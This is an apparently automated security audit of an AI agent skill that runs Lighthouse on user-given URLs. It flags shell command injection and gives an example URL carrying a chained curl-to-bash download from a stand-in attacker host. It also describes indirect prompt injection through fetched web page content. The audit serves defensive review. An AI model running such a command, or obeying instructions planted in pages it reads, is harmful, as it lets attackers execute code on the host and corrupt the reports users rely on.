perf
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions define a workflow that executes the
lighthousecommand by directly interpolating a user-provided<url>. This pattern is highly susceptible to shell command injection. An attacker could provide a crafted URL (e.g.,https://example.com; curl http://attacker.com/script | bash) that would be executed by the host system. - [PROMPT_INJECTION] (LOW): The skill presents an indirect prompt injection surface (Category 8).
- Ingestion points: Data returned from external websites via the Lighthouse tool (titles, metadata, etc.).
- Boundary markers: Absent. There are no instructions to the agent to ignore or delimit instructions found within the page content.
- Capability inventory: The skill has the ability to execute shell commands and generate reports based on external data.
- Sanitization: Absent. Malicious instructions embedded in a target website's HTML could potentially manipulate the agent's final performance report or its interpretation of the results.
Recommendations
- AI detected serious security threats
Audit Metadata